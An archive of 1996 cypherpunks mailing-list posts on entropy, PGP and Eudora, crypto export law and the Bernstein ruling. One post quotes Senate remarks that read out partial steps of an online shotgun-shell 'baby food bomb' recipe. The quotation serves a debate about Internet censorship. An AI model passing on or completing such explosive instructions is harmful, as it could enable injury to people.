Usenet newsgroups.) *Lots* of systems are affected by this problem.

(Remember, as far as the CDA is concerned, a seventeen-year-and-eleven-
month-old downloading nekkid pictures is every bit as bad as a
six-year-old doing so.)

-- 
Alan Bostick               | They say in online country there is no middle way
mailto:abostick@netcom.com | You'll either be a Usenet man or a thug for the CDA
news:alt.grelb             |    Simon Spero (after Tom Glazer)
http://www.alumni.caltech.edu/~abostick




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 19 Apr 1996 13:05:40 +0800
To: JonWienke@aol.com
Subject: Re: why compression doesn't perfectly even out entropy
In-Reply-To: <960418184409_378088479@emout09.mail.aol.com>
Message-ID: <199604190035.UAA08733@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



JonWienke@aol.com writes:
> [Slightly ad hominem PSA deleted]
> 
> 1.  If "cooking" a byte sequence in a manner that reduces its maximum entropy
> by less than 1% allows an attacker to break your cryptosystem, then it is
> crap to begin with.  With only a little more effort, he could break it
> anyway.

I would suggest that you look at differential and linear cryptanalysis
to learn what a tiny little statistical toehold will give you.

My "ad hominem PSA" stands. I suggest people not trust Mr. Wienke's
pronouncements. He appears to be suffering from significant hubris.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 19 Apr 1996 15:31:18 +0800
To: Hal <hfinney@shell.portal.com>
Subject: Re: why compression doesn't perfectly even out entropy
In-Reply-To: <199604182255.PAA13373@jobe.shell.portal.com>
Message-ID: <199604190041.UAA08754@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Hal writes:
> The first is whether this mysterious black box, the entropy estimator,
> is really possible.  In practice the only way to know how much entropy
> you've gotten is to have a model for how the data is being generated,
> and to deduce from that an estimate of the entropy rate.  So the entropy
> estimator can't be a general-purpose calcluation, but it must be one
> which is specifically chosen, developed and tuned for the specific source
> of entropy you are dealing with.

I couldn't possibly say that better. Its the central point.

> So I think the lesson is that there is only one way to estimate entropy,
> and that is to study your source.  I have to agree with Perry that this
> filtering concept is not the way to go.  It is a red herring that lures
> you in the direction of automatic entropy estimation, and that is really
> not safe.

Thank you; you are making the point far better than I did.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 19 Apr 1996 15:49:23 +0800
To: cypherpunks@toad.com
Subject: (Fwd)
Message-ID: <199604190412.VAA12784@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


------- Forwarded Message Follows -------
Date:          Thu, 18 Apr 1996 10:01:03 -0500
From:          Al Thompson <alt@iquest.net>
To:            Multiple recipients of list NEWS <NEWS@AEN.ORG>
Subject:       


(Check out this excerpt from the recent committee report on S735.
Here's the header info.  -AT)


[Congressional Record: April 17, 1996 (Senate)]
[Page S3454-S3478]
>From the Congressional Record Online via GPO Access [wais.access.gpo.gov]


 
              TERRORISM PREVENTION ACT--CONFERENCE REPORT

  The Senate continued with the consideration of the conference report.

(A bunch deleted.  Here's one of the interesting parts  -AT)

  Mr. BIDEN. Mr. President, what I would like to speak to in an
indirect way covers this. We have had several votes on wiretaps, and
I know people are asking why am I introducing the other wiretap
provision that was taken out of the Senate bill. The reason I am is
I refuse to believe that, if you all hear this enough, you will not
eventually decide to do the right thing on this.

  The provision that I have proposed is not original with me. It was
in the Senate bill that we passed. The provision would add a
number--the bill we have before us, the conference report--would add
a number of terrorism-related offenses to the law. I will go into
those in a minute. What I have sent to the desk, if adopted, would
instruct the conferees to add the same number of offenses that we
are adding to the bill, to the law, to those categories of things
for which the Government, with probable cause, can get a wiretap. It
was in the Senate bill as introduced by Senators Hatch and Dole. It
was part of the terrorism bill reported out of Representative Hyde's
Judiciary Committee. Unfortunately, by the time the bill had made it
to the House, the provision was dropped.

  I think it is worth talking a moment about how a wiretap statute
works, the one that is in place now in the law, for it seems there
is a lot of misunderstanding about it these days. I am repeating
myself again to eliminate the misunderstanding. As some people tell
it, you would think the FBI and BATF and the local and State police
are tapping our phones left and right, that they are riding down the
streets in vans with electronic devices eavesdropping into our
windows and houses--which they have the capacity to do, by the way.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Marshall <brucem@wichita.fn.net>
Date: Fri, 19 Apr 1996 16:40:17 +0800
To: postmaster@proust.suba.com
Subject: Re: RSA-130 Falls to NFS - Lenstra Posting to sci.crypt.research (fwd)
In-Reply-To: <Pine.LNX.3.91.960418150232.28138A-100000@leghorn.fn.net>
Message-ID: <Pine.BSI.3.91.960418213846.27687B-100000@wichita.fn.net>
MIME-Version: 1.0
Content-Type: text/plain



    Please tell your user (Alex Strasheim <cp@proust.suba.com>) to be 
more careful in responding to messages to ensure that they are received 
by the correct site postmaster.  *I* was not the one requesting off the 
list.  I was merely the person the original poster happened to reply to
with their plea to remove *them* from the cypherpunks mailing list.

> ---------- Forwarded message ----------
> Date: Thu, 18 Apr 1996 00:24:15 -0500 (CDT)
> From: Alex Strasheim <cp@proust.suba.com>
> To: postmaster@fn.net
> Subject: Re: RSA-130 Falls to NFS - Lenstra Posting to sci.crypt.research (fwd)
> 
> Please tell your user that he can unsubscribe by sending the message
> 
> unsubscribe cypherpunks
> 
> to majordomo@toad.com
> 
> Posting messages like the ones he's been posting to cypherpunks don't do 
> any good -- none of the people reading them can unsubscribe him.
> 
> 
> Forwarded message:
> > From cypherpunks-errors@toad.com Thu Apr 18 00:12:51 1996
> > Date: Wed, 17 Apr 1996 18:08:25 -0700 (PDT)
> > From: Leslie Farnsworth <leslie@koalas.com>
> > To: Bruce Marshall <brucem@wichita.fn.net>
> > cc: cypherpunks@toad.com
> > Subject: Re: RSA-130 Falls to NFS - Lenstra Posting to sci.crypt.research 
> > In-Reply-To: <Pine.BSI.3.91.960417083229.17657A-100000@wichita.fn.net>
> > Message-ID: <Pine.LNX.3.91.960417180811.3310E-100000@koalas.com>
> > MIME-Version: 1.0
> > Content-Type: TEXT/PLAIN; charset=US-ASCII
> > Sender: owner-cypherpunks@toad.com
> > Precedence: bulk
> > 
> > take me of your emailing list




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 19 Apr 1996 16:42:08 +0800
To: cypherpunks@toad.com
Subject: DANGER! Baby-Food Bombs on the Internet! [was Re: (Fwd)]
In-Reply-To: <199604190412.VAA12784@jobe.shell.portal.com>
Message-ID: <Pine.ULT.3.92.960418213819.12497L-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 18 Apr 1996, the intrepid anonymous-remailer@shell.portal.com
FUDded to cypherpunks:

> [Congressional Record: April 17, 1996 (Senate)]
> [Page S3454-S3478]

[fascinating but probably out-of-context remarks from Biden, suggesting
that we should all don our tin-foil hats in fear of the FBI rabdar vans,
deleted]

I cannot find the referenced remarks.  Assuming the selection is accurate,
it is abundantly clear that Binden continued speaking beyond where you so
ominously chose to cut him off. Could you give me a *specific* URL? Or a
way to get static page number URLs? I can only figure out how to search
http://thomas.loc.gov/ and get temp URLs.

I *did* read Biden's *highly entertaining* comments on the contentious
Internet Baby Food Bomb Issue, from the conference report mentioned by the
redoubtable Mr. Anonymous. Thanks so much for pointing me to this debate;
it almost makes still being in my office worthwile.

Does anyone know the documents that Senator Biden is quoting? I *must
know* how to build The Dreaded Baby-Food Bomb.

  **I AM NOT MAKING THIS UP. THIS IS YOUR UNITED STATES SENATE AT WORK.**

>From the April 17th Congressional Record, what page I unfortunately cant
tell you, because Thomas and/or I suck:


Mr. BIDEN. Mr. President, I yield myself such time as I may use within the
limit of the time I have.

This provision is very straightforward and simple. It is beyond me why it
was taken out of the Senate version of the language that was sent to the
House.

I have heard many colleagues stand up on the floor here and rail against
pornography on the Internet, and for good reason.  Even when we thought we
had corrected the language that Senator Exon introduced to comport with
the first amendment, I still hear in my State, and I hear of people
writing about how so and so is promoting pornography on the Internet
because they will not ban pornography on the Internet.

Yet, in the bill, we came along--all of us here--and the genesis of this
came from Senator Feinstein, when it was initially offered. The majority
leader, Senator Hatch, and I had some concerns with this, and we thought
the language to ban teaching people how to make bombs on the Internet or
engage in terrorist activities on the Internet might violate the first
amendment. Senators Dole, Hatch, and I worked to tighten the language and
came up with language that was tough and true to civil liberties. It was
accepted by unanimous consent.

We have all heard about the bone-chilling information making its way over
the Internet, about explicit instructions about how to detonate pipe bombs
and even, if you can believe it, baby food bombs. Senator Feinstein quoted
an Internet posting that detailed how to build and explode one of these
things, which concludes that `If the explosion don't get'em, the glass
will. If the glass don't get'em, the nails will.'

I would like to give you a couple of illustrations of the kinds of things
that come across the Internet. This is one I have in my hand which was
downloaded. It said, `Baby food bombs by War Master.' And this is actually
downloaded off the Internet. It says:

These simple, powerful bombs are not very well known, even though all of
the materials can be obtained by anyone (including minors). These things
are so--

I will delete a word because it is an obscenity.

powerful that they can destroy a CAR. The explosion can actually twist and
mangle the frame. They are extremely deadly and can very easily kill you
and blow the side of a house out if you mess up while building it. Here is
how they work.

This is on the Internet now. It says:

Go to Sports Authority or Herman's Sport Shop and buy shotgun shells. It
is by the hunting section. At the Sports Authority that I go to you can
actually buy shotgun shells without a parent or an adult. They don't keep
it behind the glass counter, or anything like that. It is $2.96 for 25
shells.

And then it says:

Now for the hard part. You must cut open the plastic housing of the bullet
to get to the sweet nectar that is the gun powder. The place where you can
cut is CRUCIAL. It means a difference between it blowing up in your face
or not.

Then there is a diagram, which is shown as to how to do that on the
Internet. Then it says:

You must not make the cut directly where the gun powder is, or it will
explode. You cut it where the pellets are.

And then it goes through this in detail. And then it gets to the end, and
it says:

Did I mention that this is also highly illegal? Unimportant stuff that is
cool to know.

And then it rates shotgun shells by two numbers, gauge, pellet size, and
goes into great detail. It is like building an erector set. It does it in
detail.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Marshall <brucem@wichita.fn.net>
Date: Fri, 19 Apr 1996 14:51:17 +0800
To: cypherpunks@toad.com
Subject: Re: plaugue of unsubscribes
In-Reply-To: <199604181716.MAA00534@crawfish.suba.com>
Message-ID: <Pine.BSI.3.91.960418223537.4560B-100000@wichita.fn.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 18 Apr 1996, Alex Strasheim wrote:

> I've started sending mail to postmasters when I get one of those "take me 
> off your list!" messages.  

	Yes, as you have probably already read, my postmaster received such 
a message from you about my supposed lack of knowledge when it comes to 
unsubscribing.  He had quite a good laugh before asking me whether I had 
removed my brain while reading mail..

	BTW, I returned the favor with the above mentioned response to your 
initial letter.  Please be more careful in the future.

Bruce Marshall




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@cs.berkeley.edu>
Date: Fri, 19 Apr 1996 20:39:11 +0800
To: Steven Weller <stevenw@best.com>
Subject: Re: Eudora Mac Pro 3.0
In-Reply-To: <v01540b01ad9c8d2cb5d3@[206.86.1.35]>
Message-ID: <317727E9.A3A2824@cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Steven Weller wrote:
> 
> From the list of new features:
> 
> New Translation Services API: this is a programming interface that will make it
>        easier for other software applications to simply plug into Eudora
> Pro software,
>        opening up a whole new world of uses for e-mail. For example,
> natural language
>        translation products that can translate a message from English to
> some other
>        language. Another example is a security application that could
> automatically
>        encrypt/decrypt your messages.
> 
> Interesting....
> 
> http://www.qualcomm.com/quest/mac30B.html

Yep. This is the real thing. Qualcomm seems quite serious about making
sure that real encryption is widely available in the Eudora world,
without adversely affecting their ability to export Eudora itself.

I've exchanged PGP/MIME messages with the people at Qualcomm who
developed a plug-in for this API. It worked great the first try. I was
impressed. The PGP/MIME plugin is based on Apple Events communicating
with MacPGP, which isn't perfect, but it's probably the best that's
possible until either PGP 3.0 gets its act together or someone else
implements PGP message formats.

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter Monta <pmonta@qualcomm.com>
Date: Fri, 19 Apr 1996 20:09:03 +0800
To: cypherpunks@toad.com
Subject: Re: why compression doesn't perfectly even out entropy
Message-ID: <199604190607.XAA17848@mage.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry Metzger writes:

> > 1.  If "cooking" a byte sequence in a manner that reduces its
> > maximum entropy by less than 1% allows an attacker to break your
> > cryptosystem, then it is crap to begin with.  With only a little
> > more effort, he could break it anyway.
>
> I would suggest that you look at differential and linear cryptanalysis
> to learn what a tiny little statistical toehold will give you.
>
> My "ad hominem PSA" stands. I suggest people not trust Mr. Wienke's
> pronouncements. He appears to be suffering from significant hubris.

No, he's correct; cryptanalytic schemes like those you mention rely
on statistical toeholds *in the context of a deterministic cipher
algorithm*.  For one-time pads that are "cooked" or "screened" (and
I agree that it's a silly thing to do), the toehold is much weaker,
infinitesimal in fact.

For example, suppose we take 1024-bit blocks from a physical RNG
(which we'll agree is "good", has entropy close to 1024 bits,
whatever that means).  There are 2^1024 such blocks.  Obtain one
and apply the magical test---if the block fails, toss it in the
bit bucket. Suppose, conservatively, that half the sequences fail.
The cryptanalyst now knows that the plaintext cannot be
( failed_pad xor ciphertext ) for any of the 2^1023 failed_pads.
Thus, it must be one of the other 2^1023.  This is the *only*
toehold he gets.

Cheers,
Peter Monta   pmonta@qualcomm.com
Qualcomm, Inc./Globalstar




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <steve@edmweb.com>
Date: Fri, 19 Apr 1996 17:39:02 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Legality of Crypto in Canada?
In-Reply-To: <199604181959.MAA02651@toad.com>
Message-ID: <Pine.BSF.3.91.960418225122.2533A-100000@kirk.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


> >Patents would not have prevented the Russians from using RSA, nor any other 
> >foreigners, so as far as I can see the only group of people impaired by the 
> >RSA patent were American citizens as a group.  

> (Other than Canadians..)  The reason that RSA isn't patentable in other
> countries isn't because the US is the only place that permits
> algorithm patents (many countries do, and even provide more than US;

"Other than Canadians"? Exactly what is the legal status of RSA and 
other crypto algorithms in Canada?

My understanding of ITAR is, crypto software can be exported from the USA
into Canada, but even in Canada, it remains under US ITAR laws. But what
about the patent laws? Do RSA and/or IDEA have patent strings attached up
here? 

Bottom line: Are there any potential problems with me using the 
international version of PGP (2.6.3i) up here in Canada? What about 
distributing it?

Most of the legal info I see on the net about crypto in Canada only
mentions Canada in the context of "US/Canada". :-/


=====================================================================
| Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/)    |
| Email: steve@edmweb.com   Home Page: http://www.edmweb.com/steve/ |
| PGP Fingerprint: 11 C8 9D 1C D6 72 87 E6  8C 09 EC 52 44 3F 88 30 |
|              -- Disclaimer: JMHO, YMMV, IANAL. --                 |
===================================================================:)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathon Blake <grafolog@netcom.com>
Date: Fri, 19 Apr 1996 12:15:00 +0800
To: Patrick May <pjm@spe.com>
Subject: Re: [Explanation] Re: "STOP SENDING ME THIS SHIT"
In-Reply-To: <199604180537.WAA01617@gulch.spe.com>
Message-ID: <Pine.3.89.9604182348.A4671-0100000@netcom8>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 17 Apr 1996, Patrick May wrote:
>      Crypto relevance:  This attack will be eliminated when more mail
> agents support public key crypto and the mailing list software can be
> modified to check signatures on subscription requests.

	Isn't that what PGPDomo does?

        xan

        jonathon
        grafolog@netcom.com



**********************************************************************
*								     *
*	Opinions expressed don't necessarily reflect my own views.   *
*								     *
*	There is no way that they can be construed to represent      *
*	any organization's views.				     *
*								     *
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
*	ftp://ftp.netcom.com/pub/gr/graphology/home.html	     *
*								     *
*			     OR					     *
*								     *
*       http://members.tripod.com/~graphology/index.html             *
*								     *
***********************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Gibbons <steve@aztech.net>
Date: Fri, 19 Apr 1996 21:25:27 +0800
To: jleonard@divcom.umop-ap.com
Subject: Re: Spaces in passwords
Message-ID: <009A110B.0F384760.631@aztech.net>
MIME-Version: 1.0
Content-Type: text/plain


# > I have a hard enough time getting lusers to choose non-dictionary 
# > passwords that they can *remember* - one technique is to teach sub-100 
# > i.q. types to use two words, seperated by a #,@, etc., with a number 
# > tossed in: kill#pig1et, which isn't a dictionary word, but has a chance of 
# > being remembered without writing it on a sticky note and pasting it to 
# > the @#%&ing monitor.

# It's hard.  I'd really rather have longer pass{words,phrases} so that there's
# the potential for lots of entropy without requiring line-noise for passwords.

One of the ideas that I've been kicking around in the back of my head for a
while for stronger, easier to uses user authentication goes something like
this:

1) User enters a pass-phrase.

2) System "tokenizes" the pass-phrase.
   The tokenization would probably include a normalization step: condensing
   white-space and punctuation, standardizing the casing of words, perhaps 
   even going so far as converting 3133+ speak to something readable.

   Once normalized, the pass-phrase would be parsed, and tokenized.  It would
   be useful to have a large system-wide dictionary, sorted by how common a 
   given word or group of words is normally used in the most commonly used 
   languages that the system's users speak/write.  Any word or group of words
   found in the dictionary would be converted to a number, representing its
   position in the dictionary, and the significant bits of that number are 
   concatenated to a running bit string.  Words and tokens not found in the
   dictionary would pass through some other algorithm that I haven't thought
   too much about, yet.

3A) System examines the tokenized pass-phrase against another (probably _very_
    large) dictionary of common phrases for acceptability.  (maybe just
    comparing the hashes of the phrases [smaller dictionary])

    System also examines the "length" of the tokenized pass-phrase for 
    acceptability (for pass-phrase changes.)

3B) System hashes the tokenized pass-phrase, and compares it against the
    previously stored hash (for authentication.)
    [ Standard crypt(3) stuff ]

Ignoring the fact that strong one-time-passwords are orders of magnitude 
better, what would something like this buy you?

0) "Good" pass-phases should be more difficult to brute-force or inteligently
    attack than simple (8 or 16 byte) passwords.  [ rm /usr/local/bin/crack ]

1) Pass-phrases are generally easier to remember than system-generated
   passwords.  [ no more post-its pasted to screens or hidden under keyboards
   with passwords written on them. ]

2) Pass-phrases can be a pain to type in correctly, the normalization step
   should help in this regard.  [ happier users ]
   
3) Enforcement of selecting good pass-phrases is difficult.  This scheme
   addresses _some_ of the issues involved.  [ The next generation of 'crack'
   won't have a foothold - happier security officers. ]

This message has been sponsored by off-the-cuff, back-of-the-brain, and
poorly-thought-out; comments and suggestions/improvements are welcomed.

--
Steve@AZTech.Net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Fri, 19 Apr 1996 19:10:53 +0800
To: Ecafe Mixmaster Remailer <mixmaster@remail.ecafe.org>
Subject: Re: "STOP SENDING ME THIS SHIT"
In-Reply-To: <199604171641.JAA26692@atropos.c2.org>
Message-ID: <4lRliVy00YUv1nTLZr@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 19-Apr-96 Re: "STOP SENDING ME THIS
S.. by Ecafe M. Remailer@remail 
> But...  will it have any traffic?  How will people know they are on
> the list if they ignore the original subscription confirmation?

I subscribed to Sameer's "clueless" list yesterday and haven't seen any
posts so far. :(

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Sat, 20 Apr 1996 03:08:41 +0800
To: cypherpunks@toad.com
Subject: Here's the judge's decision in the Bernstein case
Message-ID: <199604190802.BAA11461@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


[Forgive the scannos in the interest of speed.  This is also at 
 http://www.eff.org/pub/Legal/Cases/Bernstein_v_DoS/Legal/960415.decision]

UNITED STATES DISTRICT COURT
NORTHERN DISTRICT OF CALIFORNIA

DANIEL J. BERNSTEIN,                |	No. C-95-0582 MHP
                                    |
               Plaintiff,           |	OPINION
                                    |
           vs.                      |
                                    |
UNITED STATES DEPARTMENT OF STATE   |        
et al.,                             | 			    
               Defendants.          |
____________________________________|


Plaintiff Daniel Bernstein brought this action against the Department of
State and the individually named defendants seeking declaratory and
injunctive relief from their enforcement of the Arms Export Control Act
("AECA"), 22 U.S.C. ¤ 2778, and the International Traffic in Arms
Regulations ("ITAR"), 22 C.F.R. Sections 120-30 (1994), on the grounds that
they are unconstitutional on their face and as applied to plaintiff. Now
before this court is defendants' motion to dismiss for lack of
justiciability.1

Having considered the parties' arguments and submissions, and for the
reason set forth below, the court enters the following memorandum and
order.

BACKGROUND 2

At the time this action was filed, plaintiff was a PhD candidate in
mathematics at University of California at Berkeley working in the field
of cryptography, an area of applied mathematics that seeks to develop
confidentiality in electronic communication.


     A.   Cryptography

Encryption basically involves running a readable message known as
"plaintext" through a computer program that translates the message
according to an equation or algorithm into unreadable "ciphertext."
Decryption is the translation back to plaintext when the message is
received by someone with an appropriate "key." The message is both
encrypted and decrypted by common keys. The uses of cryptography are
far-ranging in an electronic age, from protecting personal messages over
the Internet and transactions on bank ATMs to ensuring the of military
intelligence.

As a graduate student, Bernstein developed an encryption algorithm he
calls "Snuffle." He describes Snuffle as a zerodelay private-key
encryption system. Complaint Exh. A. Bernstein has articulated his
mathematical ideas in two ways: in an academic paper in English entitled
"The Snuffle Encryption System," and in "source code" written in "C", a
high-level computer programming language,3 detailing both the encryption
and decryption, which he calls "Snuffle.c" and

"Unsnuffle.c", respectively. Once source code is converted into "object
code," a binary system consisting of a series of 0s and 1s read by a
computer, the computer is capable of encrypting and decrypting data. 4


       B. Statutory and Regulatory Background

The Arms Export Control Act authorizes the President to control the
import and export of defense articles and defense services by
designating such items to the United States Munitions List ("USML").  22
U.S.C. ¤ 2778(a)(1). Once on the USML, and unless otherwise exempted, a
defense article or service requires a license before it can be imported
or exported. 22 U.S.C. ¤ 2778(b)(2).

The International Traffic in Arms Regulations, 22 C.F.R. Sections 120-30, were
promulgated by the Secretary of State, who was authorized by executive
order to implement the AECA. The ITAR is administered primarily within
the Department of State by the Director of the Office of Defense Trade
Controls ("ODTC"), Bureau of Politico-Military Affairs. The ITAR allows
for a "commodity jurisdiction procedure" by which the ODTC determines if
an article or service is covered by the USML when doubt exists about an
item. 22 C.F.R. ¤ 120.4(a).

Categories of items covered by the USNL are enumerated at section 121.1.
Category XIII, Auxiliary Military Equipment, includes "Cryptographic
(including key management) systems, equipment, assemblies, modules,
integrated circuits, components

or software with the capability of maintaining secrecy or
confidentiality of information or information systems .... __ _     
¤ 121 XIII(b)(l). A number of applications of cryptography are excluded,
such as those used in automated teller machines and certain mass market
software products that use encryption. Id.


C. Plaintiff's Commodity Jurisdiction Determinations On June 30, 1992
Bernstein submitted a commodity jurisdiction ("CJ") request to the State
Department to determine whether three items were controlled by ITAR.
Those items were Snuffle.c and Unsnuffle.c (together referred to as
Snuffle 5.0), each submitted in C language source files, and his
academic paper describing the Snuffle system. Complaint Exh. A. On
August 20, 1992 the ODTC informed Bernstein that after consultation with
the Departments of Commerce and Defense it had determined that the
commodity Snuffle 5.0 was a defense article under Category XIII of the
ITAR and subject to licensing by the Department of State prior to
export. The ODTC identified the item as a "stand-alone cryptographic
algorithm which is not incorporated into a finished software product."
Complaint Exh. B. The ODTC further informed plaintiff that a commercial
software product incorporating Snuffle 5.0 may not be subject to State
Department control and should be submitted as a new commodity
jurisdiction request.

Plaintiff and ODTC exchanged copious and contentious correspondence
regarding the licensing requirements during the spring of 1993. Still
unsure if his academic paper had been included in the ODTC CJ
determination of August 20, 1992, Bernstein submitted a second CJ
request on July 15, 1993, asking for a separate determination for each
of five items. According to plaintiff these items were 1) the paper,
"The Snuffle Encryption System," 2) Snuffle.c, 3) Unsnuffle.c, 4) a
description in English of how to use Snuffle, and 5) instructions in
English for programming a computer to use Snuffle.5 On October 5, 1993
the ODTC notified Bernstein that all of the referenced items were
defense articles under Category XIII(b)(1). Complaint Exh. E; Defendant
Exh. 18. After plaintiff initiated this action, the ODTC wrote to
plaintiff to clarify that the CJ determinations pertained only to
Snuffle.c and Unsnuffle.c and not to the three items of explanatory
information, including the paper. Defendant Exh. 21. Bernstein appealed
the first commodity jurisdiction determination on September 22, 1993.
That appeal is still pending.

Plaintiff seeks to publish and communicate his ideas on cryptography.
Because "export" under the ITAR includes "[d]isclosing . . . technical
data to a foreign person, whether in the United States or abroad",
Bernstein asserts that he is not free to teach the Snuffle algorithm, to
disclose it at

academic conferences, or to publish it in journals or online discussion
groups without a license.


LEGAL STANDARD

A motion to dismiss will be denied unless it appears that the plaintiff
can prove no set of facts which would entitle him or her to relief.
Conlev v. Gibson, 355 U.S. 41, 45-46 (1957); Fidelity Financial Corp. v.
Federal Home Loan Bank of San Francisco, 792 F.2d 1432, 1435 (9th Cir.
1986), cert. denied, 479 U.S. 1064 (1987). All material allegations in
the complaint will be taken as true and construed in the light most
favorable to the plaintiff. NL Industries. Inc. v. Kaplan, 792 F.2d 896,
898 (9th Cir. 1986). Although the court is generally confined to
consideration of the allegations in the pleadings, when the complaint is
accompanied by attached documents, such documents are deemed part of the
complaint and may be considered in evaluating the merits of a Rule
12(b)(6) motion. Durning v. First Boston Corp., 815 F.2d 1265, 1267 (9th
Cir.), cert. denied sub. nom. Wyomina Community Dev. Auth. v. Durning,
484 U.S. 944 (1987).


DISCUSSION

Plaintiff makes a number of allegations of unconstitutionality with
respect to the AECA and ITAR. Specifically, plaintiff alleges that the
act and accompanying regulations, both facially and as applied, are a
content-based

infringement on speech, act as an unconstitutional prior restraint on
speech, are vague and overbroad, and infringe the rights of association
and equal protection. Bernstein also alleges that the CJ request and
registration processes as well as the licensing procedures are
unconstitutional, although he does not state the basis of their
unconstitutionality. Finally, plaintiff alleges that the actions of
defendants are arbitrary and capricious and constitute an abuse of
discretion under the Administrative Procedure Act, 5 U.S.C. Sections 701 et ~g
Defendants move to dismiss on the grounds that these issues are
nonjusticiable.


I. Justiciability The AECA plainly states:

The designation by the President (or by an official to whom the
President's functions under subsection (a) of this section have been
duly delegated), in regulations issued under this section, of items as
defense articles or defense services for purposes of this section shall
not be subject to judicial review. 22 U.S.C. ¤ 2778(h). Defendants
conclude that this language, as well as the Constitution, precludes
review of commodity jurisdiction determinations by this court. Plaintiff
does not dispute this assessment. Defendants characterize this action as
an attempt to obtain judicial review of their CJ determinations to place
plaintiff's cryptographic items on the USML; as such, they maintain the
action is precluded. However, this characterization does not comport
with either the complaint

itself or plaintiff's repeated assertions that he is not seeking
judicial review of defendants' CJ decision, but of the constitutionality
of the statute and its regulations.

It is well established under the political question doctrine that courts
do not have the expertise to examine sensitive political questions
reserved for the other branches of government. See Baker v. Carr, 369
U.S. 186 (1962). More to the point, as defendants note, the
determination of whether an item should be on the USML "possesses nearly
every trait that the Supreme Court has enumerated traditionally renders
a question 'political."' United States v. Martinez, 904 F.2d 601, 602
(llth Cir. 1990) (finding the CJ determination nonjusticiable without
deciding if the then recent amendment to the AECA precluding judicial
review applied to that case). However, a review of a particular CJ
decision is a distinctly different question from a constitutional
challenge to a statute. In Martinez, the Eleventh Circuit noted that
defendants had not alleged a constitutional violation.6 904 F.2d at 603.

With respect to constitutional questions, the judicial branch not only
possesses the requisite expertise to adjudicate these issues, it is also
the best and final interpreter of them. Furthermore, as plaintiff points
out, federal courts have consistently addressed constitutional issues in
the context of national security concerns. See. e.q., New York Times Co.
v. United States, 403 U.S. 713 (1971); Haia v. Aaee,

453 U.S. 280 (1981). Because the issues before this court do not
necessitate a factual inquiry into the CJ determination, but a legal one
into broader constitutional claims, the question is whether the
statutory preclusion of judicial review of CJ decisions also embraces
this court's review of the statute's constitutionality. 7

Defendants cite a number of Ninth Circuit cases that reject the
reviewability of commodity designations under the analogous Export
Administration Act, 50 U.S.C. App. Sections 2401 et seq., administered by the
Commerce Department. Because this court is not reviewing the CJ
determination itself, those cases miss the mark. Of those cases,
however, United States v. Bozarov, 974 F.2d 1037 (9th Cir. 1992), cert.
denied, 507 U.S. 917 (1993), is instructive.

In Bozarov the defendant was charged with exporting items on the
Commerce Control List ("CCL")--which is akin to the USML--without a
license in violation of the statute. The items, which were computer disk
manufacturing equipment, had been listed on the CCL for national
security reasons. Bozarov challenged the constitutionality of the Act's
preclusion of judicial review. In upholding the preclusion of review,
however, the court noted its decision was "bolstered by the fact that
certain limited types of judicial review are available under the EAA
despite the Act's seemingly absolute preclusion of review. First,
colorable constitutional claims may be reviewed by the courts even when
a statute otherwise

precludes judicial review." Id. at 1044 (citing Webster v. Doe, 486 U.S.
592, 602-05 (1988)). In fact, in order to reach the question of whether
it was constitutional to preclude judicial review, the Ninth Circuit had
to first find the issue justiciable. There, even the government conceded
that Bozarov's nondelegation challenge amounted to a colorable
constitutional claim. 974 F.2d at 1044 n.7. More definitive still is the
Supreme Court's decision in Webster_, where it addressed whether
employment decisions by the Director of the CIA were subject to judicial
review. In Webster, plaintiff Doe was discharged from the CIA after
informing the agency that he was a homosexual. He contested his
termination partly on constitutional grounds. The Court held that the
applicable statute bestowed so much discretion on the CIA Director in
terminating employees that judicial review of those decisions was
precluded under section 701(a)(2) of the APA. However, the Court made
clear that such a holding did not preclude review of constitutional
claims, noting that where Congress intends to preclude judicial review
of constitutional claims its intent to do so must be clear.... We
require this heightened showing in part to avoid the "serious
constitutional question" that would arise if a federal statute were
construed to deny any judicial forum for a colorable constitutional
claim. 486 U.S. at 603 (citations omitted). 8 In the instant case,
Congress has clearly precluded review of CJ determinations under the
AECA, 22 U.S.C. ¤ 2778(h). But it has just as clearly tailored the
preclusion of review to the designation by the President or his delegate
"of items as

I defense articles or defense services for the purposes of this
section." Id. Moreover, the language of section (h) indicates that it
pertains only to delegations of the President's "functions under
subsection (a) of this section." Those functions do not include
constitutional determinations.

